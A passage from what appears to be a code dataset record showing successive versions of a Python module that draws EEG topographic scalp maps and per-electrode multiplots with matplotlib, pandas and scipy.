electrode].plot(ax=subaxes, xlim=\n xlim, ylim=ylim)\n if not axis:\n trans = transforms.blended_transform_factory(\n subaxes.transAxes, subaxes.transData)\n line = lines.Line2D((0, 1), (0, 0), transform=\n trans, color=(0, 0, 0))\n subaxes.add_line(line)\n trans = transforms.blended_transform_factory(\n subaxes.transAxes, subaxes.transAxes)\n line = lines.Line2D((0, 0), (0, 1), transform=\n trans, color=(0, 0, 0))\n subaxes.add_line(line)\n elif type == 'spectrogram':\n spectrum, frequencies, midpoints, axes = plt.specgram(\n self.data.ix[:, electrode], Fs=self.data.\n sampling_rate, vmin=vmin, vmax=vmax, axes=subaxes)\n if xlim is None:\n xlim = midpoints[0], midpoints[-1]\n subaxes.set_xlim(xlim)\n if ylim is None:\n ylim = frequencies[0], frequencies[-1]\n subaxes.set_ylim(ylim)\n else:\n raise ValueError(\"Wrong value for 'type' argument\")\n if not axis:\n subaxes.set_axis_off()\n subaxes.text(0.5, 0.95, electrode, transform=subaxes.\n transAxes, fontweight='bold', va='top', ha='center')\n subaxes.set_yticklabels([])\n subaxes.set_xticklabels([])\n self._subaxes.append(subaxes)\n\n @property\n def xlim(self):\n \"\"\"Return xlim for subplots.\"\"\"\n lim = [ax.get_xlim() for ax in self._subaxes]\n if lim == []:\n lim = None\n return lim\n\n @xlim.setter\n def xlim(self, left=None, right=None):\n \"\"\"Set x-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_xlim(left, right)\n self.figure.canvas.draw()\n\n @property\n def ylim(self):\n \"\"\"Return ylim for subplots.\"\"\"\n lim = [ax.get_ylim() for ax in self._subaxes]\n if lim == []:\n lim = None\n return lim\n\n @ylim.setter\n def ylim(self, bottom=None, top=None):\n \"\"\"Set y-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_ylim(bottom, top)\n self.figure.canvas.draw()\n\n @property\n def yscale(self):\n \"\"\"Return yscale for subplots.\"\"\"\n yscales = [ax.get_yscale() for ax in self._subaxes]\n return yscales\n\n @yscale.setter\n def yscale(self, value='linear'):\n \"\"\"Set y-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_yscale(value)\n self.figure.canvas.draw()\n\n def auto_ylim(self, xlim=None, yscale='linear'):\n \"\"\"Return an estimate for a good ylim.\n\n Parameters\n ----------\n xlim : 2-tuple, optional\n Limits in (the index of) the data from where the scaling should be\n computed.\n yscale : linear or log, optional\n Scaling of y-axis.\n\n \"\"\"\n electrodes = [col for col in self.data.columns if col in ELECTRODES]\n if xlim is None:\n data = self.data.ix[:, electrodes]\n else:\n indices = (self.data.index >= xlim[0]) & (self.data.index <=\n xlim[1])\n data = self.data.ix[indices, electrodes]\n min_data = data.min().min()\n max_data = data.max().max()\n abs_max = max(abs(min_data), max_data)\n if yscale == 'linear' or yscale == 'symlog':\n if min_data >= 0:\n ylim = 0, max_data\n else:\n ylim = -abs_max, abs_max\n elif yscale == 'log':\n if min_data > 0:\n ylim = min_data, max_data\n else:\n pseudo_zero = abs_max * 10 ** -5\n ylim = pseudo_zero, abs_max\n else:\n raise ValueError('Wrong value to yscale: {}'.format(yscale))\n return ylim\n\n def draw(self, type='plot', title=None, xlim=None, ylim=None, vmin=None,\n vmax=None, axis=False, yscale='linear'):\n \"\"\"Draw all components in multiplot including the data.\n\n Parameters\n ----------\n title : str, optional\n Title to put on the plot\n xlim : tuple of floats, optional\n X-axis limits used for each individual plots\n ylim : tuple of floats, optional\n Y-axis limits used for each individual plots\n\n \"\"\"\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\n self.draw_head()\n self.draw_inner_head()\n self.draw_nose()\n self.draw_data(type=type, xlim=xlim, ylim=ylim, vmin=vmin, vmax=\n vmax, axis=axis, yscale=yscale)\n if title is not None:\n self.axes.set_title(title)\n self.yscale = yscale\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass TopoPlot(object):\n \"\"\"Topographic plot.\"\"\"\n\n def __init__(self, data=None, axes=None):\n \"\"\"Setup defaults.\n\n Parameters\n ----------\n data : Pandas.Series or dict\n Pandas Series with values indexed by electrodes.\n axes : matplotlib.axes.AxesSubplot object\n Axis object to render on.\n\n \"\"\"\n if axes is None:\n self.figure = plt.figure()\n axes = self.figure.gca()\n else:\n self.figure = axes.get_figure()\n self.axes = axes\n self.center = np.array((0, 0))\n if isinstance(data, dict):\n self.data = pd.Series(data)\n elif isinstance(data, pd.Series):\n self.data = data\n elif data is None:\n self.data = None\n else:\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\n type(data)))\n\n @staticmethod\n def normalize_electrode_name(name):\n \"\"\"Normalize electrode name.\n\n Parameters\n ----------\n name : str\n Name of electrode to be normalized\n\n Examples\n --------\n >>> TopoPlot.normalize_electrode_name('fpz')\n 'Fpz'\n\n >>> TopoPlot.normalize_electrode_name('AFZ')\n 'AFz'\n\n \"\"\"\n return name.upper().replace('FPZ', 'Fpz').replace('Z', 'z')\n\n def draw_electrodes(self):\n \"\"\"Draw electrodes.\"\"\"\n for electrode, position in ELECTRODES.items():\n circle = plt.Circle(self.center + position, radius=0.04, fill=\n True, facecolor=(1, 1, 1))\n self.axes.add_patch(circle)\n position = self.center + position\n self.axes.text(position[0], position[1], electrode,\n verticalalignment='center', horizontalalignment='center',\n size=6)\n\n def draw_head(self):\n \"\"\"Draw outer head.\"\"\"\n circle = plt.Circle(self.center, radius=1, fill=False)\n self.axes.add_patch(circle)\n\n def draw_inner_head(self):\n \"\"\"Draw inner head.\"\"\"\n circle = plt.Circle(self.center, radius=0.8, fill=False)\n self.axes.add_patch(circle)\n\n def draw_nose(self):\n \"\"\"Draw nose.\"\"\"\n nose = plt.Line2D([sin(-0.1), 0, sin(0.1)], [cos(-0.1), 1.1, cos(\n 0.1)], color=(0, 0, 0))\n self.axes.add_line(nose)\n\n def draw_data(self, method='linear', number_of_contours=10):\n \"\"\"Draw countours from provided data.\"\"\"\n if self.data is not None:\n xi, yi = np.mgrid[-1:1:100.0j, -1:1:100.0j]\n points = []\n for electrode in self.data.index:\n name = TopoPlot.normalize_electrode_name(electrode)\n points.append(ELECTRODES[name])\n zi = griddata(points, self.data.values, (xi, yi), method=method)\n if number_of_contours is None:\n number_of_contours = 10\n plt.contourf(xi, yi, zi, number_of_contours)\n\n def draw(self, title=None, method='linear', number_of_contours=None):\n \"\"\"Draw all components in topoplot including the data.\n\n Parameters\n ----------\n title : str, optional\n Title to put on the plot\n methods : str, optional\n Interpolation method\n number_of_contours : int\n Number of contours in the colored plot.\n\n Examples\n --------\n >>> import matplotlib.pyplot as plt\n >>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}\n >>> plt.ion()\n >>> topo_plot = TopoPlot(data)\n >>> topo_plot.draw()\n\n \"\"\"\n self.draw_head()\n self.draw_inner_head()\n self.draw_electrodes()\n self.draw_nose()\n self.draw_data(method=method, number_of_contours=number_of_contours)\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\n self.axes.axis('equal')\n if title is not None:\n self.axes.set_title(title)\n\n\nclass MultiPlot(TopoPlot):\n \"\"\"Multiple plots organized topographically.\n\n References\n ----------\n http://www.fieldtriptoolbox.org/reference/ft_multiploter\n\n \"\"\"\n\n def __init__(self, data=None, axes=None, xlim=None, ylim=None):\n \"\"\"Setup defaults.\n\n Parameters\n ----------\n data : Pandas.DataFrame\n Pandas DataFrame with values indexed by electrodes.\n axes : matplotlib.axes.AxesSubplot object\n Axis object to render on.\n\n \"\"\"\n if axes is None:\n self.figure = plt.figure()\n axes = self.figure.gca()\n else:\n self.figure = axes.get_figure()\n self.axes = axes\n self._subaxes = []\n self.xlim = xlim\n self.ylim = ylim\n self.center = np.array((0, 0))\n if isinstance(data, pd.DataFrame):\n self.data = data\n elif data is None:\n self.data = None\n else:\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\n type(data)))\n\n def add_subplot_axes(self, ax, rect, axis_bgcolor=None):\n \"\"\"Add subaxes to currect specified axes.\n\n References\n ----------\n Pablo https://stackoverflow.com/users/2309442/pablo\n\n Pablo's answer to \"Embedding small plots inside subplots in matplotlib\"\n https://stackoverflow.com/questions/17458580/\n\n \"\"\"\n box = ax.get_position()\n width, height = box.width, box.height\n subaxes_box = [(rect[0], rect[1]), (rect[0] + rect[2], rect[1] +\n rect[3])]\n subaxes_display_coords = ax.transData.transform(subaxes_box)\n trans_figure = self.figure.transFigure.inverted()\n subaxes_figure_coords = trans_figure.transform(subaxes_display_coords)\n x, y = subaxes_figure_coords[0, :]\n width, height = subaxes_figure_coords[1, :] - subaxes_figure_coords[\n 0, :]\n subaxes = self.figure.add_axes([x, y, width, height], axis_bgcolor=\n axis_bgcolor)\n x_labelsize = subaxes.get_xticklabels()[0].get_size()\n y_labelsize = subaxes.get_yticklabels()[0].get_size()\n x_labelsize *= rect[2] ** 0.5\n y_labelsize *= rect[3] ** 0.5\n subaxes.xaxis.set_tick_params(labelsize=x_labelsize)\n subaxes.yaxis.set_tick_params(labelsize=y_labelsize)\n return subaxes\n\n def draw_data(self, type='plot', width=None, height=None, xlim=None,\n ylim=None, vmin=None, vmax=None, axis=False, yscale='linear'):\n \"\"\"Draw data.\n\n Parameters\n ----------\n type : 'plot', 'spectrogram', optional\n Type of plot\n xlim : 2-tuple of floats, optional\n X-axis limits\n ylim : 2-tuple of floats, optional\n Y-axis limits\n vmin : float, optional\n Minimum value for spectrogram colormap\n vmax : float, optional\n Maximum value for spectrogram colormap\n axis : bool, optional\n Determine whether the axis should be shown\n\n \"\"\"\n if self.data is not None:\n if ylim is None:\n if self.ylim is None and type != 'spectrogram':\n ylim = self.auto_ylim(xlim, yscale=yscale)\n else:\n ylim = self.ylim\n if xlim is None:\n xlim = self.xlim\n if vmin is None:\n vmin = 0\n number_of_electrodes = len([electrode for electrode in self.\n data.columns if electrode in ELECTRODES])\n if width is None:\n if number_of_electrodes > 32:\n width = 0.15\n else:\n width = 0.25\n if height is None:\n height = 0.25\n for electrode in self.data.columns:\n if electrode in ELECTRODES:\n x, y = ELECTRODES[electrode]\n subaxes = self.add_subplot_axes(self.axes, [x - width /\n 2, y - height / 2, width, height], axis_bgcolor='w')\n if type == 'plot':\n self.data.ix[:, electrode].plot(ax=subaxes, xlim=\n xlim, ylim=ylim)\n if not axis:\n trans = transforms.blended_transform_factory(\n subaxes.transAxes, subaxes.transData)\n line = lines.Line2D((0, 1), (0, 0), transform=\n trans, color=(0, 0, 0))\n subaxes.add_line(line)\n trans = transforms.blended_transform_factory(\n subaxes.transAxes, subaxes.transAxes)\n line = lines.Line2D((0, 0), (0, 1), transform=\n trans, color=(0, 0, 0))\n subaxes.add_line(line)\n elif type == 'spectrogram':\n spectrum, frequencies, midpoints, axes = plt.specgram(\n self.data.ix[:, electrode], Fs=self.data.\n sampling_rate, vmin=vmin, vmax=vmax, axes=subaxes)\n if xlim is None:\n xlim = midpoints[0], midpoints[-1]\n subaxes.set_xlim(xlim)\n if ylim is None:\n ylim = frequencies[0], frequencies[-1]\n subaxes.set_ylim(ylim)\n else:\n raise ValueError(\"Wrong value for 'type' argument\")\n if not axis:\n subaxes.set_axis_off()\n subaxes.text(0.5, 0.95, electrode, transform=subaxes.\n transAxes, fontweight='bold', va='top', ha='center')\n subaxes.set_yticklabels([])\n subaxes.set_xticklabels([])\n self._subaxes.append(subaxes)\n\n @property\n def xlim(self):\n \"\"\"Return xlim for subplots.\"\"\"\n lim = [ax.get_xlim() for ax in self._subaxes]\n if lim == []:\n lim = None\n return lim\n\n @xlim.setter\n def xlim(self, left=None, right=None):\n \"\"\"Set x-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_xlim(left, right)\n self.figure.canvas.draw()\n\n @property\n def ylim(self):\n \"\"\"Return ylim for subplots.\"\"\"\n lim = [ax.get_ylim() for ax in self._subaxes]\n if lim == []:\n lim = None\n return lim\n\n @ylim.setter\n def ylim(self, bottom=None, top=None):\n \"\"\"Set y-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_ylim(bottom, top)\n self.figure.canvas.draw()\n\n @property\n def yscale(self):\n \"\"\"Return yscale for subplots.\"\"\"\n yscales = [ax.get_yscale() for ax in self._subaxes]\n return yscales\n\n @yscale.setter\n def yscale(self, value='linear'):\n \"\"\"Set y-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_yscale(value)\n self.figure.canvas.draw()\n\n def auto_ylim(self, xlim=None, yscale='linear'):\n \"\"\"Return an estimate for a good ylim.\n\n Parameters\n ----------\n xlim : 2-tuple, optional\n Limits in (the index of) the data from where the scaling should be\n computed.\n yscale : linear or log, optional\n Scaling of y-axis.\n\n \"\"\"\n electrodes = [col for col in self.data.columns if col in ELECTRODES]\n if xlim is None:\n data = self.data.ix[:, electrodes]\n else:\n indices = (self.data.index >= xlim[0]) & (self.data.index <=\n xlim[1])\n data = self.data.ix[indices, electrodes]\n min_data = data.min().min()\n max_data = data.max().max()\n abs_max = max(abs(min_data), max_data)\n if yscale == 'linear' or yscale == 'symlog':\n if min_data >= 0:\n ylim = 0, max_data\n else:\n ylim = -abs_max, abs_max\n elif yscale == 'log':\n if min_data > 0:\n ylim = min_data, max_data\n else:\n pseudo_zero = abs_max * 10 ** -5\n ylim = pseudo_zero, abs_max\n else:\n raise ValueError('Wrong value to yscale: {}'.format(yscale))\n return ylim\n\n def draw(self, type='plot', title=None, xlim=None, ylim=None, vmin=None,\n vmax=None, axis=False, yscale='linear'):\n \"\"\"Draw all components in multiplot including the data.\n\n Parameters\n ----------\n title : str, optional\n Title to put on the plot\n xlim : tuple of floats, optional\n X-axis limits used for each individual plots\n ylim : tuple of floats, optional\n Y-axis limits used for each individual plots\n\n \"\"\"\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\n self.draw_head()\n self.draw_inner_head()\n self.draw_nose()\n self.draw_data(type=type, xlim=xlim, ylim=ylim, vmin=vmin, vmax=\n vmax, axis=axis, yscale=yscale)\n if title is not None:\n self.axes.set_title(title)\n self.yscale = yscale\n\n\ndef topoplot(data=None, axes=None, method='linear', number_of_contours=10,\n title=None, xlim=None, ylim=None):\n \"\"\"Plot topographic map of the scalp in 2-D circular view.\n\n Draw the colored scalp map based on data in a Pandas Series where\n the values are indexed according to electrode name.\n\n Parameters\n ----------\n data : pandas.Series or pandas.DataFrame, optional\n Series with values and indexed by electrode names.\n methods : str, optional\n Interpolation method\n number_of_contours : int\n Number of contours in the colored plot.\n xlim : 2-tuple of floats, optional\n Limits of x-axis in multiplot\n ylim : 2-tuple of floats, optional\n Limits of y-axis in multiplot\n\n References\n ----------\n https://github.com/compmem/ptsa/blob/master/ptsa/plotting/topo.py\n\n http://sccn.ucsd.edu/~jung/tutorial/topoplot.htm\n\n Examples\n --------\n >>> import matplotlib.pyplot as plt\n >>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}\n >>> plt.ion()\n >>> topo_plot = topoplot(data)\n\n \"\"\"\n if isinstance(data, pd.Series) or isinstance(data, dict) or data is None:\n topo_plot = TopoPlot(data=data, axes=axes)\n topo_plot.draw(title=title, method=method, number_of_contours=\n number_of_contours)\n return topo_plot\n elif isinstance(data, pd.DataFrame):\n multi_plot = MultiPlot(data=data, axes=axes)\n multi_plot.draw(title=title, xlim=xlim, ylim=ylim)\n return multi_plot\n\n\ndef show():\n \"\"\"Show plot.\"\"\"\n plt.show()\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python\r\n\"\"\"\r\nPlot EEG data.\r\n\r\nUsage:\r\n plotting.py [options] [<file>]\r\n\r\nOptions:\r\n -h --help Show this screen.\r\n --version Show version.\r\n --center Center the data before plotting\r\n --sample-index=N Row index (indexed from one).\r\n --transpose Transpose data.\r\n --xlim=lim X-axis limits.\r\n\r\nData\r\n----\r\nELECTRODES : dict\r\n Dictionary indexed by electrode name with 2D positions as values\r\n\r\nReferences\r\n----------\r\nThe five percent electrode system for high-resolution EEG and ERP\r\nmeasurement, Robert Oostenveld, Peter Praamstra.\r\n\r\n\"\"\"\r\n\r\nfrom __future__ import absolute_import, division, print_function\r\n\r\nfrom math import cos, pi, sin\r\n\r\nimport matplotlib.lines as lines\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.transforms as transforms\r\n\r\nimport numpy as np\r\n\r\nimport pandas as pd\r\n\r\nfrom scipy.interpolate import griddata\r\n\r\n\r\n__all__ = ('ELECTRODES', 'MultiPlot', 'TopoPlot', 'topoplot')\r\n\r\n\r\nELECTRODES = {\r\n 'AF3': (-0.25, 0.62),\r\n 'AF4': (0.25, 0.62),\r\n 'AF7': (0.8 * cos(0.7 * pi), 0.8 * sin(0.7 * pi)),\r\n 'AF8': (0.8 * cos(0.3 * pi), 0.8 * sin(0.3 * pi)),\r\n 'AFz': (0, 0.6),\r\n 'C1': (-0.2, 0),\r\n 'C2': (0.2, 0),\r\n 'C3': (-0.4, 0),\r\n 'C4': (0.4, 0),\r\n 'C5': (-0.6, 0),\r\n 'C6': (0.6, 0),\r\n 'CP1': (-0.18, -0.2),\r\n 'CP2': (0.18, -0.2),\r\n 'CP3': (-0.36, 0.4 * sin(1.17 * pi)),\r\n 'CP4': (0.36, 0.4 * sin(1.83 * pi)),\r\n 'CP5': (0.6 * cos(1.12 * pi), 0.6 * sin(1.12 * pi)),\r\n 'CP6': (0.6 * cos(1.88 * pi), 0.6 * sin(1.88 * pi)),\r\n 'CPz': (0, -0.2),\r\n 'Cz': (0, 0),\r\n 'F1': (-0.18, 0.4),\r\n 'F2': (0.18, 0.4),\r\n 'F3': (-0.35, 0.41),\r\n 'F4': (0.35, 0.41),\r\n 'F5': (-0.5, 0.43),\r\n 'F6': (0.5, 0.43),\r\n 'F7': (0.8 * cos(0.8 * pi), 0.8 * sin(0.8 * pi)),\r\n 'F8': (0.8 * cos(0.2 * pi), 0.8 * sin(0.2 * pi)),\r\n 'FC1': (-0.2, 0.21),\r\n 'FC2': (0.2, 0.21),\r\n 'FC3': (-0.39, 0.22),\r\n 'FC4': (0.39, 0.22),\r\n 'FC5': (-0.57, 0.23),\r\n 'FC6': (0.57, 0.23),\r\n 'FCz': (0, 0.2),\r\n 'FP1': (0.8 * cos(0.6 * pi), 0.8 * sin(0.6 * pi)),\r\n 'FP2': (0.8 * cos(0.4 * pi), 0.8 * sin(0.4 * pi)),\r\n 'Fpz': (0, 0.8),\r\n 'FT7': (0.8 * cos(0.9 * pi), 0.8 * sin(0.9 * pi)),\r\n 'FT8': (0.8 * cos(0.1 * pi), 0.8 * sin(0.1 * pi)),\r\n 'Fz': (0, 0.4),\r\n 'Iz': (0, -1),\r\n 'Nz': (0, 1),\r\n 'P1': (-0.18, -0.41),\r\n 'P2': (0.18, -0.41),\r\n 'P3': (-0.35, -0.42),\r\n 'P4': (0.35, -0.42),\r\n 'P5': (-0.5, -0.44),\r\n 'P6': (0.5, -0.44),\r\n 'P7': (0.8 * cos(1.2 * pi), 0.8 * sin(1.2 * pi)),\r\n 'P8': (0.8 * cos(1.8 * pi), 0.8 * sin(1.8 * pi)),\r\n 'PO3': (-0.24, -0.62),\r\n 'PO4': (0.24, -0.62),\r\n 'PO7': (0.8 * cos(1.3 * pi), 0.8 * sin(1.3 * pi)),\r\n 'PO8': (0.8 * cos(1.7 * pi), 0.8 * sin(1.7 * pi)),\r\n 'POz': (0, -0.6),\r\n 'Pz': (0, -0.4),\r\n 'O1': (0.8 * cos(1.4 * pi), 0.8 * sin(1.4 * pi)),\r\n 'O2': (0.8 * cos(1.6 * pi), 0.8 * sin(1.6 * pi)),\r\n 'Oz': (0, -0.8),\r\n 'T7': (-0.8, 0),\r\n 'T8': (0.8, 0),\r\n 'T9': (-1, 0),\r\n 'T10': (1, 0),\r\n 'TP7': (0.8 * cos(1.1 * pi), 0.8 * sin(1.1 * pi)),\r\n 'TP8': (0.8 * cos(1.9 * pi), 0.8 * sin(1.9 * pi)),\r\n 'TP9': (cos(1.1 * pi), sin(1.1 * pi)),\r\n 'TP10': (cos(1.9 * pi), sin(1.9 * pi)),\r\n}\r\n\r\n\r\nclass TopoPlot(object):\r\n \"\"\"Topographic plot.\"\"\"\r\n\r\n def __init__(self, data=None, axes=None):\r\n \"\"\"Setup defaults.\r\n\r\n Parameters\r\n ----------\r\n data : Pandas.Series or dict\r\n Pandas Series with values indexed by electrodes.\r\n axes : matplotlib.axes.AxesSubplot object\r\n Axis object to render on.\r\n\r\n \"\"\"\r\n if axes is None:\r\n self.figure = plt.figure()\r\n axes = self.figure.gca()\r\n else:\r\n self.figure = axes.get_figure()\r\n self.axes = axes\r\n self.center = np.array((0, 0))\r\n if isinstance(data, dict):\r\n self.data = pd.Series(data)\r\n elif isinstance(data, pd.Series):\r\n self.data = data\r\n elif data is None:\r\n self.data = None\r\n else:\r\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\r\n type(data)))\r\n\r\n @staticmethod\r\n def normalize_electrode_name(name):\r\n \"\"\"Normalize electrode name.\r\n\r\n Parameters\r\n ----------\r\n name : str\r\n Name of electrode to be normalized\r\n\r\n Examples\r\n --------\r\n >>> TopoPlot.normalize_electrode_name('fpz')\r\n 'Fpz'\r\n\r\n >>> TopoPlot.normalize_electrode_name('AFZ')\r\n 'AFz'\r\n\r\n \"\"\"\r\n return name.upper().replace('FPZ', 'Fpz').replace('Z', 'z')\r\n\r\n def draw_electrodes(self):\r\n \"\"\"Draw electrodes.\"\"\"\r\n for electrode, position in ELECTRODES.items():\r\n circle = plt.Circle(self.center + position,\r\n radius=0.04, fill=True,\r\n facecolor=(1, 1, 1))\r\n self.axes.add_patch(circle)\r\n position = self.center + position\r\n self.axes.text(position[0], position[1], electrode,\r\n verticalalignment='center',\r\n horizontalalignment='center',\r\n size=6)\r\n\r\n def draw_head(self):\r\n \"\"\"Draw outer head.\"\"\"\r\n circle = plt.Circle(self.center, radius=1, fill=False)\r\n self.axes.add_patch(circle)\r\n\r\n def draw_inner_head(self):\r\n \"\"\"Draw inner head.\"\"\"\r\n circle = plt.Circle(self.center, radius=0.8, fill=False)\r\n self.axes.add_patch(circle)\r\n\r\n def draw_nose(self):\r\n \"\"\"Draw nose.\"\"\"\r\n nose = plt.Line2D([sin(-0.1), 0, sin(0.1)],\r\n [cos(-0.1), 1.1, cos(0.1)],\r\n color=(0, 0, 0))\r\n self.axes.add_line(nose)\r\n\r\n def draw_data(self, method='linear', number_of_contours=10):\r\n \"\"\"Draw countours from provided data.\"\"\"\r\n if self.data is not None:\r\n # Coordinates for points to interpolate to\r\n xi, yi = np.mgrid[-1:1:100j, -1:1:100j]\r\n\r\n # Electrode positions for data to interpolate from\r\n points = []\r\n for electrode in self.data.index:\r\n name = TopoPlot.normalize_electrode_name(electrode)\r\n points.append(ELECTRODES[name])\r\n\r\n # Interpolate\r\n # TODO: Will not work with 2 electrodes.\r\n zi = griddata(points, self.data.values, (xi, yi), method=method)\r\n\r\n # Defaults\r\n if number_of_contours is None:\r\n number_of_contours = 10\r\n\r\n # Draw\r\n plt.contourf(xi, yi, zi, number_of_contours)\r\n\r\n # TODO: center\r\n\r\n def draw(self, title=None, method='linear', number_of_contours=None):\r\n \"\"\"Draw all components in topoplot including the data.\r\n\r\n Parameters\r\n ----------\r\n title : str, optional\r\n Title to put on the plot\r\n methods : str, optional\r\n Interpolation method\r\n number_of_contours : int\r\n Number of contours in the colored plot.\r\n\r\n Examples\r\n --------\r\n >>> import matplotlib.pyplot as plt\r\n >>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}\r\n >>> plt.ion()\r\n >>> topo_plot = TopoPlot(data)\r\n >>> topo_plot.draw()\r\n\r\n \"\"\"\r\n self.draw_head()\r\n self.draw_inner_head()\r\n self.draw_electrodes()\r\n self.draw_nose()\r\n self.draw_data(method=method, number_of_contours=number_of_contours)\r\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\r\n self.axes.axis('equal')\r\n if title is not None:\r\n self.axes.set_title(title)\r\n\r\n\r\nclass MultiPlot(TopoPlot):\r\n \"\"\"Multiple plots organized topographically.\r\n\r\n References\r\n ----------\r\n http://www.fieldtriptoolbox.org/reference/ft_multiploter\r\n\r\n \"\"\"\r\n\r\n def __init__(self, data=None, axes=None, xlim=None, ylim=None):\r\n \"\"\"Setup defaults.\r\n\r\n Parameters\r\n ----------\r\n data : Pandas.DataFrame\r\n Pandas DataFrame with values indexed by electrodes.\r\n axes : matplotlib.axes.AxesSubplot object\r\n Axis object to render on.\r\n\r\n \"\"\"\r\n if axes is None:\r\n self.figure = plt.figure()\r\n axes = self.figure.gca()\r\n else:\r\n self.figure = axes.get_figure()\r\n self.axes = axes\r\n\r\n # Contains a list of axes used to plot data data from individual\r\n # electrodes\r\n self._subaxes = []\r\n\r\n self.xlim = xlim\r\n self.ylim = ylim\r\n\r\n self.center = np.array((0, 0))\r\n\r\n if isinstance(data, pd.DataFrame):\r\n self.data = data\r\n elif data is None:\r\n self.data = None\r\n else:\r\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\r\n type(data)))\r\n\r\n def add_subplot_axes(self, ax, rect, axis_bgcolor=None):\r\n \"\"\"Add subaxes to currect specified axes.\r\n\r\n References\r\n ----------\r\n Pablo https://stackoverflow.com/users/2309442/pablo\r\n\r\n Pablo's answer to \"Embedding small plots inside subplots in matplotlib\"\r\n https://stackoverflow.com/questions/17458580/\r\n\r\n \"\"\"\r\n # Modified from\r\n # https://stackoverflow.com/questions/17458580/\r\n box = ax.get_position()\r\n width, height = box.width, box.height\r\n subaxes_box = [(rect[0], rect[1]),\r\n (rect[0] + rect[2], rect[1] + rect[3])]\r\n subaxes_display_coords = ax.transData.transform(subaxes_box)\r\n trans_figure = self.figure.transFigure.inverted()\r\n subaxes_figure_coords = trans_figure.transform(subaxes_display_coords)\r\n x, y = subaxes_figure_coords[0, :]\r\n width, height = (subaxes_figure_coords[1, :] -\r\n subaxes_figure_coords[0, :])\r\n subaxes = self.figure.add_axes(\r\n [x, y, width, height], axis_bgcolor=axis_bgcolor)\r\n x_labelsize = subaxes.get_xticklabels()[0].get_size()\r\n y_labelsize = subaxes.get_yticklabels()[0].get_size()\r\n x_labelsize *= rect[2] ** 0.5\r\n y_labelsize *= rect[3] ** 0.5\r\n subaxes.xaxis.set_tick_params(labelsize=x_labelsize)\r\n subaxes.yaxis.set_tick_params(labelsize=y_labelsize)\r\n return subaxes\r\n\r\n def draw_data(self, type='plot', width=None, height=None,\r\n xlim=None, ylim=None,\r\n vmin=None, vmax=None,\r\n axis=False, yscale='linear'):\r\n \"\"\"Draw data.\r\n\r\n Parameters\r\n ----------\r\n type : 'plot', 'spectrogram', optional\r\n Type of plot\r\n xlim : 2-tuple of floats, optional\r\n X-axis limits\r\n ylim : 2-tuple of floats, optional\r\n Y-axis limits\r\n vmin : float, optional\r\n Minimum value for spectrogram colormap\r\n vmax : float, optional\r\n Maximum value for spectrogram colormap\r\n axis : bool, optional\r\n Determine whether the axis should be shown\r\n\r\n \"\"\"\r\n if self.data is not None:\r\n\r\n if ylim is None:\r\n if self.ylim is None and type != 'spectrogram':\r\n ylim = self.auto_ylim(xlim, yscale=yscale)\r\n else:\r\n ylim = self.ylim\r\n\r\n if xlim is None:\r\n xlim = self.xlim\r\n\r\n if vmin is None:\r\n vmin = 0\r\n\r\n # Determine a suitable width for subaxes\r\n number_of_electrodes = len([\r\n electrode\r\n for electrode in self.data.columns\r\n if electrode in ELECTRODES])\r\n if width is None:\r\n if number_of_electrodes > 32:\r\n width = 0.15\r\n else:\r\n width = 0.25\r\n if height is None:\r\n height = 0.25\r\n\r\n for electrode in self.data.columns:\r\n if electrode in ELECTRODES:\r\n\r\n # Axes and position\r\n x, y = ELECTRODES[electrode]\r\n subaxes = self.add_subplot_axes(\r\n self.axes,\r\n [x - width / 2, y - height / 2, width, height],\r\n axis_bgcolor='w')\r\n\r\n # Actual data plot\r\n if type == 'plot':\r\n self.data.ix[:, electrode].plot(\r\n ax=subaxes, xlim=xlim, ylim=ylim)\r\n\r\n if not axis:\r\n # x-axis\r\n trans = transforms.blended_transform_factory(\r\n subaxes.transAxes, subaxes.transData)\r\n line = lines.Line2D(\r\n (0, 1), (0, 0),\r\n transform=trans, color=(0, 0, 0))\r\n subaxes.add_line(line)\r\n\r\n trans = transforms.blended_transform_factory(\r\n subaxes.transAxes, subaxes.transAxes)\r\n line = lines.Line2D(\r\n (0, 0), (0, 1),\r\n transform=trans, color=(0, 0, 0))\r\n subaxes.add_line(line)\r\n\r\n elif type == 'spectrogram':\r\n spectrum, frequencies, midpoints, axes = plt.specgram(\r\n self.data.ix[:, electrode],\r\n Fs=self.data.sampling_rate,\r\n vmin=vmin,\r\n vmax=vmax,\r\n axes=subaxes)\r\n\r\n # Adjust axis around spectrogram image.\r\n if xlim is None:\r\n xlim = midpoints[0], midpoints[-1]\r\n subaxes.set_xlim(xlim)\r\n if ylim is None:\r\n ylim = frequencies[0], frequencies[-1]\r\n subaxes.set_ylim(ylim)\r\n\r\n else:\r\n raise ValueError(\"Wrong value for 'type' argument\")\r\n\r\n if not axis:\r\n subaxes.set_axis_off()\r\n\r\n # Annotation\r\n # http://matplotlib.org/users/transforms_tutorial.html\r\n subaxes.text(0.5, 0.95, electrode,\r\n transform=subaxes.transAxes,\r\n fontweight='bold', va='top', ha='center')\r\n subaxes.set_yticklabels([])\r\n subaxes.set_xticklabels([])\r\n\r\n self._subaxes.append(subaxes)\r\n\r\n @property\r\n def xlim(self):\r\n \"\"\"Return xlim for subplots.\"\"\"\r\n lim = [ax.get_xlim() for ax in self._subaxes]\r\n if lim == []:\r\n lim = None\r\n return lim\r\n\r\n @xlim.setter\r\n def xlim(self, left=None, right=None):\r\n \"\"\"Set x-axis limits on all subplots.\"\"\"\r\n for ax in 